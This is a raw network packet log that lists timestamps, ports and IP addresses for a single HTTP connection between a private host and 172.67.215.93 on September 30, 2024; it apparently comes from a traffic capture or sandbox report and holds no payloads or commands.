Sep 30, 2024 15:10:13.347841978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347860098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.347892046 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.348062038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.348232985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.348737955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.348781109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.348862886 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.349056959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.349651098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.349669933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.350272894 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.350272894 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.595868111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.595942020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.595997095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596049070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596226931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596227884 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596256018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596317053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596354008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596369028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596369982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596533060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596699953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.596811056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596890926 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.596968889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597042084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597165108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597165108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597165108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597332001 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597563982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597630978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597695112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597721100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597759962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.597942114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.597942114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.598459005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.598553896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.598640919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.598661900 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.598723888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.598829985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.599000931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.599000931 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.599349022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.599481106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.599509954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.599562883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.599684000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.599728107 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.599728107 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600064993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600076914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.600157976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.600235939 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600259066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.600331068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600338936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.600502968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600672007 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.600908041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.600987911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.601106882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.601114035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.601195097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.601329088 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.601329088 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.601496935 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.601857901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.601952076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602031946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.602045059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602154016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602205992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.602205992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.602372885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.602672100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602775097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602848053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.602868080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.602960110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.603023052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.603188038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.603188992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.603506088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.603590965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.603668928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.603687048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.603796959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.603842020 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.604011059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.604011059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.604330063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.604413033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.604487896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.604677916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.604677916 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.604703903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.604892015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.605441093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.605506897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.605576992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.605587959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.605657101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.605753899 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.605921984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.605989933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.606169939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.606189013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.606250048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.606329918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.606409073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.606456995 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.606627941 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.607089996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607175112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607249022 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.607269049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607345104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607428074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.607589006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.607759953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607826948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607907057 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.607913971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.607983112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.608078957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.608247995 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.608247995 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.608680010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.608773947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.608848095 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.608854055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.609019041 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609189034 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609198093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.609407902 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609496117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.609577894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.609656096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.609694958 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609740019 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609910011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.609925985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.610081911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.610593081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.610682964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.610881090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.610881090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.610918045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.610990047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.611191034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.611222029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.611222029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.611263990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.611439943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.611573935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.611610889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.611705065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.611948967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.611948967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.850315094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850332975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850348949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850474119 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.850634098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.850660086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850675106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850826025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.850929022 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.850965977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.850987911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.851008892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.851099014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.851099014 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.851146936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.851438999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.851521015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.851569891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.851757050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.851757050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.851757050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.852000952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.852194071 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.852411032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.852463961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.852478981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.852574110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.852755070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.852755070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.853225946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.854598045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854634047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854654074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854691029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854758024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854778051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854796886 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854821920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854881048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.854885101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.854885101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855076075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855079889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855139971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855165958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855222940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855427980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855427980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855711937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855757952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855825901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.855842113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.855974913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.856570005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.856570005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.856724024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.856746912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.856771946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.856790066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.857423067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.857470036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.857522011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.857568979 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.857568979 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.857712030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.857758999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.857981920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.858316898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.858366013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.858386040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.858427048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.858752012 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.858762980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.861689091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861732006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861763954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861783981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861809015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861826897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861845016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.861862898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.862073898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862075090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862452984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.862500906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.862555027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.862667084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.862740993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862740993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862910986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862910986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.862931013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863050938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863162994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863214970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863251925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863251925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863298893 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863437891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863456964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863470078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863538980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863641024 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863667011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863790035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863811970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.863883972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.863883972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.864201069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.864201069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.864758968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.864866972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.864917994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.864988089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.865037918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.865109921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.865165949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.865185976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.865293026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.865293026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.865293026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.865293026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.865473986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.866116047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866170883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866190910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866208076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866328001 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.866360903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866410971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866466045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866518974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.866522074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.866693974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.866693974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.866693974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.867285967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.867409945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.867465973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.867486000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.867676020 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.867676020 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.867834091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.868247986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.868277073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.868510962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.868534088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.868941069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.868941069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.868941069 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.868946075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869091034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869111061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869128942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869328022 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.869906902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869947910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869951963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.869951963 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.869966984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.869985104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.870119095 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.870310068 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:13.870740891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.870784044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.870803118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:13.870820999 CEST	80	49754	172.67.215.93	192.168.11.20
